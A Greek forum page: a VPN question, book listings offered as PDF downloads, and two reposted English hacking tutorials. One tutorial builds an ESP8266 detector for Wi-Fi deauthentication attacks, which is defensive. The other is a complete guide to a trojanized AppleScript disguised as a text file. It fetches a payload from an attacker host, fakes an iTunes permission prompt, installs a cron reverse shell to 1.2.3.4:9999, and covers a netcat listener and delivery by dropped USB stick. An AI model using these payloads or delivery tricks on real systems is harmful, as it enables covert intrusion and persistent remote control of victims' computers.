Jump to content

Recommended Posts

de4d_R1n63r

Γεια σας, 

Θέλω να φύγω εξωτερικό και σκεφτομαι πως θα ήταν καλή ιδέα να αγοράσω ένα αποτελεσματικό vpn! 

Τι έχετε να προτείνετε; 

Ευχαριστώ εκ των προτέρων ! :) 

Share this post


Link to post
Share on other sites
AplexTM

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε προκειμένου να το δείτε

Πρέπει να είστε μέλος για να μπορέσετε να αφήσετε κάποιο σχόλιο

Δημιουργία λογαριασμού

Κάντε μια δωρεάν εγγραφή στην κοινότητά μας. Η εγγραφές μας είναι εύκολες.!

Εγγραφή τώρα

Σύνδεση

Εάν έχετε ήδη λογαριασμό σε αυτό το Forum; Συνδεθείτε εδώ.

Συνδεθείτε τώρα

  • Μηνύματα

    • dionysos
      ΤΑ ΠΗΓΑΔΙΑ ΤΗΣ ΚΟΛΑΣΕΩΣ - GRAHAM MASTERTON


      Αν ο Διάβολος δεν υπάρχει, τότε πρέπει να τον δημιουργήσει ο άνθρωπος, κατ’ εικόνα και ομοίωσή του – Ντοστογέφσκι Το Νιου Μίλφορντ του Κονέτικατ είναι μια μικρή, ήσυχη πόλη όπου δεν συμβαίνει σχεδόν ποτέ τίποτα – ώσπου μέσα σε μια νύχτα το νερό στα πηγάδια παίρνει μια αρρωστημένη κιτρινωπή απόχρωση… Ένα αγοράκι βρίσκεται νεκρό κάτω από αλλόκοτες συνθήκες και οι γονείς του εξαφανίζονται, ενώ παράλληλα αρχίζουν να διαρρέουν φήμες πως στα σκοτάδια παραμονεύουν φολιδωτά καβουροπλάσματα… Κάτω από την πόλη ξυπνάει πάλι μια αρχαία δύναμη που ζητάει καινούρια θύματα για να ενισχύσει τις στρατιές μιας φυλής που ξεπηδά κατευθείαν από τα Πηγάδια της Κολάσεως.


      Συγγραφέας: Masterton Graham
      Τίτλος πρωτοτύπου: The Wells of Hell
      Κατηγορία: επιστημονική φαντασία
      Σελίδες: 299
      Εκδόσεις: ΟΞΥ
      Γλώσσα: Ελληνικά
      Έκδοση: 2018
      Μετάφραση: ΜΑΡΙΑ ΜΟΥΝΤΟΚΑΛΑΚΗ
      Μορφή αρχείου: pdf
      Μέγεθος αρχείου zip: 16.37MB



    • dionysos
      ΜΥΣΤΙΚΑ ΣΤΟΝ ΤΑΦΟ - TAMI HOAG


      Μια μητέρα δολοφονείται. Η καρδιά ενός παιδιού ραγίζει. Μόνο μια γυναίκα μπορεί ν' αποκαλύψει την αλήθεια. Ένα ανατριχιαστικό τηλεφώνημα κινητοποιεί την Aμεση Δράση: «Ο μπαμπάς μου χτύπησε τη μαμά μου», λέει μια παιδική φωνή. Η Μαρίσα Φόρνταμ βρίσκεται βάναυσα δολοφονημένη, με την τετράχρονη κόρη της, τη Χέιλι, να ακουμπάει το κεφαλάκι της στο ματωμένο στήθος της μητέρας της. Με μια τέτοια συγκλονιστική μαρτυρία, η εύρεση του δράστη θα έπρεπε να είναι παιχνίδι. Ωστόσο, κανείς δε γνωρίζει ποιος είναι ο πατέρας της Χέιλι και η ίδια δεν πρόκειται να μιλήσει γιΆ αυτόν. Η Ανν Λεόνε, δικαστική συμπαραστάτρια παιδιών, συνειδητοποιεί πως πίσω από αυτή την ιστορία κρύβονται πολλά μυστικά. Περισσότερα απΆ όσα θα μπορούσε κανείς να φανταστεί. Η Ανν, ο σύζυγός της ο Βινς, πράκτορας της Μονάδας Επιστημών Συμπεριφοράς του FBI, και ο ντετέκτιβ Τόνι Μέντεζ αρχίζουν να σκαλίζουν σε βάθος τη ζωή της Μαρίσα Φόρνταμ. Αλλά τα στοιχεία είναι λίγα και ασύνδετα μεταξύ τους. Όλα δείχνουν ότι η νεκρή έχει πάρει τα μυστικά της στον τάφο. Ώσπου μια ανακάλυψη ανατρέπει τα πάντα και θέτει την Ανν και τη Χέιλι στο στόχαστρο ενός δολοφόνου: η Μαρίσα Φόρνταμ δεν υπήρξε ποτέ.


      Ξενόγλωσσος τίτλος: SECRETS TO THE GRAVE
      Θέμα: ΛΟΓΟΤΕΧΝΙΑ / ΞΕΝΗ ΠΕΖΟΓΡΑΦΙΑ / Η.Π.Α.
      Σελίδες: 546
      Εκδόσεις: BELL
      Γλώσσα: Ελληνικά
      Χρονολογία Έκδοσης    Νοέμβριος 2015
      Μετάφραση: ΠΑΛΜΥΡΑ ΙΣΜΥΡΙΔΟΥ
      Μορφή αρχείου: pdf
      Μέγεθος αρχείου zip: 24.10MB
      Credits: Manitsa



    • dionysos
      ΦΟΥΡΤΟΥΝΑ ΤΟΝ ΚΑΙΡΟ ΤΗΣ ΚΑΣΤΑΝΙΑΣ - ΕΝΓΚΙΝ ΑΚΤΕΛ


      H ιστορία διαδραματίζεται στη νήσο Αντιγόνη, ένα από τα ωραιότερα μέρη των Πριγκηπονήσων, που διακρίνεται για τις εξαιρετικές φυσικές της ομορφιές και τον κοσμοπολιτισμό των κατοίκων της. Κύρια δύναμη που καθορίζει τη ζωή των κατοίκων είναι η θάλασσα, αλλά και η αγάπη και το μίσος που χαρακτηρίζει τις ανθρώπινες σχέσεις στη μικρή τοπική κοινωνία της δεκαετίας του ’40. Μυθιστόρημα λυρικό και επικό συγχρόνως, με ιδιαίτερο ενδιαφέρον για τους Έλληνες, το Φουρτούνα τον καιρό της καστανιάς κατορθώνει να ταξιδέψει τον αναγνώστη σε κόσμους και συναισθήματα που θα θυμάται για πολύ καιρό.
      Μικρό μου, καλώς ήλθες στον κόσμο μας. Το γεγονός αυτό θα σημάνει το δικό σου τέλος, αλλά και τη σωτηρία τη δική μου. Σε παρακαλώ, μη με κοιτάς σαν να είμαι κανένας τύραννος. Όπως εσύ για να επιβιώσεις υποχρεώνεσαι να φας τους κολιούς, τις παπαλίνες, τους γαύρους, έτσι κι εγώ είμαι υποχρεωμένος να φάω εσένα. Τα πιο θηριώδη όντα αυτού του κόσμου είμαστε εμείς οι άνθρωποι. Ίσως να σου το έχει μάθει αυτό η μητέρα σου.
      Ή δεν πρόφθασε να σου το μάθει, επειδή στο μεταξύ είχε αγκιστρωθεί στην άκρη μιας βόλτας ή εγκλωβίστηκε σε κάποιο δίχτυ.
      Έτσι επιβιώνει ο κόσμος... Τα πάντα είναι θέμα τροφής...


      Γλώσσα: Ελληνικά
      Σελίδες: 368
      Εκδόσεις: ΚΑΣΤΑΝΙΩΤΗΣ
      Έκδοση: 2010
      Μετάφραση: ΣΤΕΛΙΟΣ ΡΟΪΔΗΣ
      Μορφή αρχείου: pdf
      Μέγεθος αρχείου zip: 13.00MB



    • CyberKid
      The most common Wi-Fi jamming attacks leverage deauthentication and disassociation packets to attack networks. This allows a low-cost ESP8266-based device programmed in Arduino to detect and classify Wi-Fi denial-of-service attacks by lighting a different color LED for each type of packet. The pattern of these colors can also allow us to fingerprint the tool being used to attack the network. Types of Jamming Attacks Jammers used in electronic warfare typically require equipment that overwhelms the signal of the target with radio energy, making it impossible to distinguish between the signal and the noise being introduced to the channel the target is using to communicate; This kind of jamming is popular because it works, but it also requires specialized equipment that is banned or heavily regulated in most countries. Another type of jamming attempts to send messages that force the target to be disconnected from the network they are connected to, rather than drowning out a target's signal by trying to overwhelm it. You might think this kind of attack might only work if you are connected to the network, but this is where WPA has a severe flaw. Because so-called management frames are not encrypted, it is possible to send disruptive messages from outside the network which causes people inside the network to be unable to connect.   Deauthentication Packets The most common way this sort of attack is done is with deauthentication packets. These are a type of "management" frame responsible for disconnecting a device from an access point. Forging these packets is the key to hacking many Wi-Fi networks, as you can forcibly disconnect any client from the network at any time. The ease of which this can be done is somewhat frightening and is often done as part of gathering a WPA handshake for cracking. Aside from momentarily using this disconnection to harvest a handshake to crack, you can also just let those deauths keep coming, which has the effect of peppering the client with deauth packets seemingly from the network they are connected to. Because these frames aren't encrypted, many programs take advantage of management frames by forging them and sending them to either one or all devices on a network. Dissasociation Packets Disassociation packets are another type of management frame that is used to disconnect a node (meaning any device like a laptop or cell phone) from a nearby access point. The difference between deauthentication and disassociation frames is primarily that an AP looking to disconnect a rogue device would send a deauthentication packet to inform the device it has been disconnected from the network, whereas a disassociation packet is used to disconnect any nodes when the AP is powering down, rebooting, or leaving the area. Common Wi-Fi Denial of Service Tools There are many different tools to attack Wi-Fi networks, and many of them just automate more basic tools like Aireplay-ng and MDK3. We've covered both using and detecting both tools before, but in this example, we'll be setting a few design goals for detecting attacks against a network. To do that, we need to understand the way each work to effectively jam a Wi-Fi network. Aireplay-ng is often used to disconnect clients momentarily to obtain a Wi-Fi handshake, and it uses forged deauthentication packets to disconnect any networks or clients the user specifies either with a set number of deauthentication packets, or a continuous stream. It's also used in frameworks like Airgeddon, which allow the results of scans to automatically be fed into Aireplay to actively attack any networks discovered in an area in real time. MDK3 uses a blend of disassociation and deauthentication packets, initially having a slower onset than an Aireplay-ng attack. This attack is also used in frameworks like Airgeddon, and it can be differentiated by the alternating pattern of deauthentication and disassociation packets it sends. Tweaking the Deauth Detector To design a detector, I looked to find a script for the NodeMCU to base our design off of. I found Spacehuhn's DeauthDetector, which is a sketch in Arduino for ESP8266 devices like the NodeMCU that turns on an LED when a certain number of deauthentication or disassociation packets are detected. This is another of Spacehuhn's excellent designs, and you should check out his website (disable ad blockers) to see more of his ESP8266-based projects. Inside the DeauthDetector code, I found exactly what I needed to use an LED to show the type of attack underway, rather than just turning on a light when an attack is present. if(buf[12] == 0xA0 || buf[12] == 0xC0){ This line may look similar if you followed our guide to using Wireshark to do the same thing. That's because the capture filter we used to find deauthentication and disassociation packets looks at the same elements, so we can split this code that looks for both into two different sections, one for managing a variable that tracks each kind of packet and turns on a corresponding LED to alert the user. What You'll Need To build this detector, you'll need a NodeMCU or ESP8266-based device. You'll also need a computer running Arduino IDE to program it, and either a three-color (RGB), four-pin LED or at least two LEDs to indicate when a packet of each type is detected. You'll need a breadboard to wire this all together as well, and it's recommended you use a resistor or potentiometer to avoid burning out your LED. Here's a list of what I ended up using: ESP8266 NodeMCU CP2102 development board wireless module (less than $6 per unit) Solderless breadboard kit with jumper wires (around $11, but you can probably find a single breadboard with a few jumpers for less) Tricolor LED (around $9 for a bunch, but you can get just one at a local store for super cheap) Micro-USB cable (you probably already have one of these) Resistors (optional, if you want the LED to last longer) Step 1Download & Configure Arduino IDE The free, cross-platform Arduino IDE will allow us to quickly prototype what we need. Arduino IDE (the IDE stands for "integrated development environment") allows you to quickly write and upload scripts to Arduino-like microcontroller devices. You can download the Arduino IDE from the official website. Once it's installed, you'll need to click on the "Arduino" drop-down menu, then select "Preferences." Next, paste the following URL into the Additional Boards Manager URLs field. Click "OK" to continue. http://arduino.esp8266.com/stable/package_esp8266com_index.json Next, you'll need to add the NodeMCU to the Boards Manager. To do this, you'll need to click on "Tools," then hover over the "Board" section to see the drop-down list of supported boards. At the top, click "Boards Manager" to open the window that will allow us to add more boards. When the Boards Manager window opens, type "esp8266" into the search bar. Select "esp8266" by "ESP8266 Community," and install it to add support for the NodeMCU to your Arduino IDE. Once this is done, you should be ready to program your NodeMCU. Plug your NodeMCU into your breadboard and your NodeMCU into the computer. When you click on "Tools," you should see the correct port auto-selected. Select the "NodeMCU 1.0." If you're using a bad cable, the port may not show up, so if you don't see anything after you've completed the other steps, try another cable first. Step 2Download the DeauthDetector Now that we have our IDE set up, we can download Spacehuhn's DeauthDetector to get started modifying the code. You can download the original version here if you'd like to follow along, but I'll be using my forked version below for our example. In a terminal window, type the following to download the modified DeauthDetector, change to its directory, and list the contents. git clone https://github.com/skickar/DeauthDetector.git cd DeauthDetector ls Once inside the new folder containing the downloaded files, you'll see an INO sketch file and two libraries that we will need for the project to work. Open the INO file in Arduino IDE, then click on "Sketch" in the menu at the top. Select "Add File" to select the two libraries we downloaded along with the INO file. Make sure to add mac.cpp and mac.h or our code will fail. Once we have the library added, we can push the code to our NodeMCU, but let's take a look inside the code and see how it works. Step 3Tweak the Deauth Detector Code First and most obviously, we have our main settings. There are a collection of definitions that dictate how the code functions. Here, we can define whether or not we want to channel hop or just stay on one channel by setting the "channelHopping" setting to "true." Depending on where we are, we can define the highest channel to scan to while channel hopping (Japan is 14, while the US only goes to 11), and the number of packets detected per minute which we will decide an attack is underway. Because we are tweaking the detector, this won't be so important. //===== SETTINGS =====// #define channel 1 //the channel it should scan on (1-14) #define channelHopping true //scan on all channels #define maxChannel 13 //US = 11, EU = 13, Japan = 14 #define ledPin 2 //led pin ( 2 = built-in LED) #define inverted false // invert HIGH/LOW for the LED #define packetRate 3 //min. packets before it gets recognized as an attack Next, we have a series of variables which keep track of things in the script. I've added two variables to keep track of deauthentication and disassociation packets, creatively named "dissoc" and "deauth." #define scanTime 500 //scan time per channel in ms //Mac from; //Mac to; unsigned long c = 0; unsigned long deauth = 0; unsigned long dissoc = 0; unsigned long prevTime = 0; unsigned long curTime = 0; int curChannel = channel; Next, we have a sniffer function, and an "if" statement that adds to the "c" counter, which is counting how many deauthentication or disassociation packets we have received. I've commented this out because we will be tracking them individually. void sniffer(uint8_t *buf, uint16_t len) { /* if(buf[12] == 0xA0 || buf[12] == 0xC0){ c++; } */ Instead, we'll insert two "if" statements that will add to a cooldown timer. Whenever we detect disassociation packets, we'll turn on an LED by setting the cooldown timer to 500, and then subtract one from the timer one each time we scan a packet that isn't a dissociation packet. This means the light will stay on continuously when an attack is underway and turn off as soon as the attack stops and normal traffic resumes. The same logic is true for deauthentication packets, which we track in the second "if" statement. if(buf[12] == 0xA0){ dissoc = 500; } if(buf[12] == 0xC0){ deauth = 500; } Now, we'll decide what happens when the packet doesn't match, meaning it's a normal Wi-Fi packet and not one we're looking for. To handle this, we'll use an "else" clause that says that if the cooldown timer for "deauth" or "dissoc" is equal to or greater than one, subtract one from the timer. Otherwise, if the timer is already at zero, do nothing. else{ if (deauth >= 1){ deauth--;} if (dissoc >= 1){ dissoc--;} } In our setup loop, we'll set up our pins for output mode and Spacehuhn's sniffer functions get to work scanning for packets. We specify we want to turn on pins D5, D6, and D7 with the pinMode(pin, mode) function, in this case turning the pins on for output mode. This code will let us control the LEDs from these pins. void setup() { Serial.begin(115200); wifi_set_opmode(STATION_MODE); wifi_promiscuous_enable(0); WiFi.disconnect(); wifi_set_promiscuous_rx_cb(sniffer); wifi_set_channel(curChannel); wifi_promiscuous_enable(1); pinMode(D5, OUTPUT); pinMode(D6, OUTPUT); pinMode(D7, OUTPUT); } Now, we have our main loop, the part of the code that runs over and over again. In this section of the code, we define the time and define the logic that actually turns on the LEDs. void loop() { curTime = millis(); if(curTime - prevTime >= scanTime){ prevTime = curTime; In this section, we set up what happens depending on the value of our cooldown timer, which starts at zero but gets set to 500 each time there is a deauthentication or disassociation packet. Each is tracked separately and one is subtracted from each every time a normal packet is detected if the cooldown timer isn't already zero. Here, we simply say that if the cooldown timer is one or more, turn on the LED by turning the corresponding pin high. Also included is the logic for inverting the LED, which you can set true or false at the beginning. if(deauth >= 1){ if(inverted) digitalWrite(D5, LOW); else digitalWrite(D5, HIGH);} else{ if(inverted) digitalWrite(D5, HIGH); else digitalWrite(D5, LOW); } if(dissoc >= 1){ if(inverted) digitalWrite(D7, LOW); else digitalWrite(D7, HIGH); } else{ if(inverted) digitalWrite(D7, HIGH); else digitalWrite(D7, LOW); } Finally, we say that if the value of the cooldown timer is "else" (in this case, less than one), to turn off the LED. This is the last of our modifications, and the last part of the code controls the channel hopping and sets the NodeMCU to scan on the next channel, assuming channel hopping is enabled. if(channelHopping){ curChannel++; if(curChannel > maxChannel) curChannel = 1; wifi_set_channel(curChannel); } } } The final code should look like this: #include <ESP8266WiFi.h> #include "Mac.h" extern "C" { #include "user_interface.h" } //===== SETTINGS =====// #define channel 1 //the channel it should scan on (1-14) #define channelHopping true //scan on all channels #define maxChannel 13 //US = 11, EU = 13, Japan = 14 #define ledPin 2 //led pin ( 2 = built-in LED) #define inverted false // invert HIGH/LOW for the LED #define packetRate 3 //min. packets before it gets recognized as an attack #define scanTime 500 //scan time per channel in ms unsigned long deauth = 0; unsigned long dissoc = 0; unsigned long prevTime = 0; unsigned long curTime = 0; int curChannel = channel; void sniffer(uint8_t *buf, uint16_t len) { if(buf[12] == 0xA0){ dissoc = 500; } if(buf[12] == 0xC0){ deauth = 500; } else{ if (deauth >= 1){ deauth--;} if (dissoc >= 1){ dissoc--;} } //} } void setup() { Serial.begin(115200); wifi_set_opmode(STATION_MODE); wifi_promiscuous_enable(0); WiFi.disconnect(); wifi_set_promiscuous_rx_cb(sniffer); wifi_set_channel(curChannel); wifi_promiscuous_enable(1); pinMode(D5, OUTPUT); pinMode(D6, OUTPUT); pinMode(D7, OUTPUT); Serial.println("starting!"); } void loop() { curTime = millis(); if(curTime - prevTime >= scanTime){ prevTime = curTime; Serial.println((String)c); if(deauth >= 1){ if(inverted) digitalWrite(D5, LOW); else digitalWrite(D5, HIGH);} else{ if(inverted) digitalWrite(D5, HIGH); else digitalWrite(D5, LOW); } if(dissoc >= 1){ if(inverted) digitalWrite(D7, LOW); else digitalWrite(D7, HIGH); } else{ if(inverted) digitalWrite(D7, HIGH); else digitalWrite(D7, LOW); } if(channelHopping){ curChannel++; if(curChannel > maxChannel) curChannel = 1; wifi_set_channel(curChannel); } } } When the modifications are complete (or when you're ready since it's already done in our example), you can press the arrow icon in the top left of Arduino IDE to push your code to the NodeMCU. Step 4Wire & Test the Modified DeauthDetector Once you have the code pushed to the NodeMCU, you can wire your four-pin, three-color RGB LED in one of two ways. Most direct is plugging it directly next to the D5, D6, D7, and ground pins on the mini breadboard. This works great, and probably won't burn out the LED, but to be safe, you may want to use a resistor in your design. To include a resistor, place it between the ground pin and whichever ground pin you are using on the NodeMCU. Once this is wired, you should be ready to go! Follow our guides to using MDK3 and Airplay-ng to fire off some hostile packets against a network you have permission to, and see if the LED lights up in response. In addition, watch for patterns in the colors that appear, as they'll directly reflect the behavior of the program being used. You can check our guide on launching Wi-Fi denial of service attacks below. Be warned, these attacks are very illegal against networks you don't have permission to test, so make sure you have permission before doing so. More Info: Use MDK3 for Advanced Wi-Fi Jamming   Handheld Wi-Fi Jamming Detector This tool is a great way of visualizing Wi-Fi attacks and allows anyone to see when an attack is present and what kind of Wi-Fi packets are involved with a minimum of work. Rather than needing Wireshark running to see what's going on around you, this simple project shows whether an attack is in progress and, if so, what kind of attack is being used.
    • CyberKid
      The latest macOS security update tries to make parts of the operating system difficult for hackers to access. Let's take a closer look at how this new feature works and what we can do to spoof the origin of an application attempting to access protected data. MacOS introduced some new new security features in the recent Mojave 10.14 release. One feature identifies applications attempting to copy, modify, or use certain files and services. This feature will present the user with a security notification for applications attempting to access the location services, built-in camera, address book, microphone, and other sensitive data. Below is an example notification of this new feature in action. In the above GIF, an attacker is attempting to use a trojanized AppleScript that appears as an ordinary text file to modify protected data. The target is being social engineered into opening the file called "passwords.txt" — which presumably contains content interesting enough to make them double-click the file. The first part of that payload opens an actual text file containing arbitrary data designed to make them believe the file is legitimate. The second part happens transparently in the background without the target's knowledge. This kind of attack is explained in greater detail in my "How to Create a Fake PDF Trojan with AppleScript" article. As we can see, Mojave identifies the nefarious activity happening in the background and immediately alerts the target user. This new security feature prevented part of the attack — well done, Mojave, well done. This got me thinking about ways of circumventing this security feature. After a bit of trial and error, I formulated a simple payload that performs the following activity. This time it appears as if iTunes is requesting administrative access to the user's data. If the target clicks the "OK" button, the payload will execute. It's not uncommon for macOS (previously called "OS X") users to experience iTunes and App Store notifications, so this seemed like an ideal social engineering tactic. The other thing you'll notice is how much time there is between TextEdit and iTunes opening. The delay was added, intentionally in an effort to further conceal the background activity. The goal is to execute the nefarious activity minutes — or even hours — after the target has opened the fake text file. The more time placed between clicking the file and executing the payload, the less likely the target is of suspecting the fake passwords.txt file as the origin of the activity. Understanding the Attack Now that we know what the attack looks like, let's dive into the technical details. There are two AppleScripts used in this attack. The first AppleScript is disguised to appear as a normal text file and will open a real file to make the target believe it's legitimate. It will then immediately download, decompress, and execute a second AppleScript which embeds a persistent backdoor into macOS by attempting to add a cronjob. The use of a second AppleScript is how the application name in the security notification is changed (or spoofed). MacOS doesn't specify which iTunes application is requesting access to protected data. So any application we name "iTunes" will appear in the security notification as such. 1First AppleScript Technical Details Below is the Bash one-liner used in the first AppleScript. There are eight commands chained together here using the && and ; Bash operators. I'll explain each command individually, in order. do shell script "echo 'my password is 123456' > /tmp/passwords.txt && open /tmp/passwords.txt -a TextEdit && p='/tmp/iTunes'; curl -s http://1.2.3.4/iTunes.zip -o $p.zip && unzip $p.zip -d /tmp/ && chmod 7777 $p.app; sleep 60 && open -a iTunes.app && open $p.app" do shell script "..." — This string is required at the start of AppleScripts to run Bash (encased in double-quotes) on the target's MacBook. echo 'my password is 123456' > /tmp/passwords.txt — A new text file is created in the target's /tmp directory called passwords.txt. This is done using echo and should resemble the file name of the AppleScript file intended for the target (passwords.txt). I'm using a very simple string that reads "my password is 123456" in this example, however, it should be more elaborate in a real engagement. open /tmp/passwords.txt -a TextEdit — After creating the text file, it will immediately open using the TextEdit application (-a). Presenting the target with legitimate content as soon as possible will help convince them the AppleScript is actually a text file. The following commands happen in the background, transparent to the target. p='/tmp/iTunes' — The letter "p" is being used as variable for /tmp/iTunes. The next few commands are now able to use $p to reference the variable. This is done to minimize the number of characters required in the following commands. In a real engagement, this file path might be much longer, so it makes sense to use a variable here. curl -s http://1.2.3.4/iTunes.zip -o $p.zip — The second AppleScript (iTunes.zip) which contains the backdoor attempt is silently (-s) downloaded from the attacker's system (1.2.3.4) and saved (-o) using the $p variable. This AppleScript is compressed to make downloading it from the attacker's server easy. unzip $p.zip -d /tmp/ — The .zip is then decompressed using unzip and saved in the target's /tmp directory (-d). It's automatically given the "iTunes.app" file name and extension upon decompression. chmod 7777 $p.app — The decompressed .app is given permission to execute in macOS using chmod. ; — This semicolon between the chmod and sleep commands is possibly the single most important character in the entire payload. It will sever the chain of commands from the current process ID executed by the first (passwords.txt) AppleScript and begins an entirely new chain. This is how we're able to change the application name ("iTunes") in the macOS security notification. MacOS no longer recognizes or acknowledges the initial file (passwords.txt) opened by the target. At this point, it's no longer able to see which process actually executed the second AppleScript ("iTunes.app"). sleep 60 — To create doubt within the target, an arbitrary delay can be added before the execution. The value of "60" will introduce a sixty-second pause before performing the proceeding commands in the chain. A much higher value (e.g., 3600) would put more time between when the target clicked on the first AppleScript and when the second is executed. open -a iTunes.app — The real iTunes application (-a) is opened to legitimize the accompanied security notification. open $p.app — Finally, the second AppleScript is executed using the "iTunes" file name and requests access to protected data. 2Second AppleScript Technical Details Below is the (much simpler) Bash script used in the second AppleScript. do shell script "echo '* * * * * bash -i >& /dev/tcp/1.2.3.4/9999 0>&1' | crontab -" Here, echo is inserting (|) a bash one-liner into the crontab command. The Bash command will attempt to create a new TCP connection every sixty seconds to the attacker's machine (1.2.3.4) on port 9999. If successful, the target's MacBook will continue to attempt connections to the attacker's IP address. Readers interested in scheduling cronjobs at intervals other than sixty-seconds should check out Ole Michelsen's article on using crontab in macOS. Step 1Prepare the Netcat Listener for Incoming Connections The Netcat listener should be started in Kali or on a virtual private server in your control. This is where the target MacBook will connect to when the second AppleScript is executed. Use the below Netcat command to start the listener. nc -l -p 9999 nc -l — Netcat will open a listening (-l) port on every available interface. The listener will be available to all devices on your local network via your IP address (e.g., 192.168.0.xx). -p 9999 — The port (-p) number (9999) is arbitrary and can be changed as needed. Step 2Create the First AppleScript The following steps require Script Editor, a macOS-only scripting application, designed to create AppleScripts. Readers who don't have access to a Mac computer to follow along should explore the Empire AppleScript Stager. Open Script Editor and enter the following text in a new document. do shell script "echo 'my password is 123456' > /tmp/passwords.txt && open /tmp/passwords.txt -a TextEdit && p='/tmp/iTunes'; curl -s http://1.2.3.4/iTunes.zip -o $p.zip && unzip $p.zip -d /tmp/ && chmod 7777 $p.app; sleep 60 && open -a iTunes.app && open $p.app" Click on "File" in the menu bar, then "Export." Save the script using the "Application" file format. Then, spoof the file extension and change the icon. Spoofing the file extension and creating file icons are methods better explained in my previous "How to Hack Mojave 10.14 with a Self-Destructing Payload" and "How to Create a Fake PDF Trojan with AppleScript" articles. Step 3Create the Second ('iTunes') AppleScript To create the second AppleScript, open a new Script Editor window and enter: do shell script "echo '* * * * * bash -i >& /dev/tcp/1.2.3.4/9999 0>&1' | crontab -" Remember to change the attacker's address (1.2.3.4) to the local network IP address hosting the Netcat listener. If you opted to use a port other than "9999," be sure to reflect that in the above command as well. Then, "Export" the second AppleScript using the "Application" format with the "iTunes" file name. This is the file name the user will see in the security notification. Save it into a directory of your choosing. I'm using a new directory called "pythonServer" on my desktop. Don't worry about spoofing the file name or extension here. The target won't see this file as it'll be downloaded and executed silently in the background. Step 4Compress the Second ('iTunes') AppleScript Compressing the second AppleScript will make it easy to transport (or download) onto the target's MacBook. Right-click on the AppleScript and select the "Compress" option to create a .zip file. Step 5Host the Second ('iTunes') AppleScript Now, we'll need to make the iTunes.zip downloadable to everyone on the network. Open a Terminal and use the below command to change into the directory where you saved the iTunes.zip. cd /Users/<username>/Desktop/pythonServer/ Then, start a simple Python web server using the below command. python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... The SimpleHTTPServer module (-m) will create a web server using port 80. Changing the below 1.2.3.4 address to your local IP address, this web server can be tested by navigating to the following URL using a web browser. http://1.2.3.4/iTunes.zip This Python Terminal must be kept open for the server to remain active. Step 6Deliver the AppleScript to the Target The easiest method for social engineering a macOS target into opening malicious AppleScripts is by performing a USB flash drive drop attack. The matter of macOS' high susceptibility to USB flash drive drops is covered at length in my "How to Hack Mojave with a Self-Destructing Payload" article. Adding a key and labeling the USB flash drive will also help convince the target that someone unintentionally lost it. The USB flash drive containing the AppleScripts should be strategically placed somewhere your intended target will undoubtedly find it. This could be on their desk, front doorstep, or by slipping it into their purse or backpack when they're not looking. Sharing an AppleScript with a remote target is a lengthier process and hasn't been covered in a Null Byte article yet. Stay tuned for future articles where I'll cover how to do that in detail. Step 7Improve the Attack (Optional) You can hardcode the .zip into the payload. In my example, the second AppleScript ("iTunes.zip") was downloaded to the target's MacBook using curl. However, if the target isn't connected to the internet when the first AppleScript (passwords.txt) is opened, the second would fail to download. To prevent such occurrences, it would be possible to base64 encode the .zip, embed the encoded data into the first AppleScript, and decode it using the target's machine when opened. Also, you can deploy a remote server. This tutorial focused on performing the attack on a local network; a Wi-Fi network shared with the target MacBook. Alternatively, it can be done without being connected to the target's Wi-Fi network, where Netcat and the second AppleScript are hosted on a virtual private server (VPS). There are benefits to using a VPS in this scenario. Most notably, the attacker would be able to control the target MacBook from anywhere in the world. Additionally, the attacker wouldn't need access to the target's Wi-Fi network when the AppleScripts were executed, so no degree of WPA2 hacking would be required. The use of a VPS grants a lot of freedom to the attacker and doesn't confine them to the target's Wi-Fi network. Final Thoughts ... Apple's new security features protect a small selection of files and directories but fail to provide full coverage of the operating system. While this protects the address book and photos from quickly being exfiltrated by an attacker, it doesn't protect very much outside of the address book or photos directories. It also doesn't prevent attackers from finding alternative ways of backdooring the operating system. For instance, this tutorial demonstrated a quick method for backdooring macOS by invoking the new security feature. Other methods, like the one used in my recent "How to Hack Mojave with a Self-Destructing Payload" article, go completely undetected by Apple's new security features. Furthermore, there's more than one way of accessing the MacBook's microphone, webcam, and browser passwords without alerting the target. I think all macOS users will appreciate Apple's latest attempts toward building a secure operating system — but don't be fooled by the hype. MacOS still has a long way to go.
×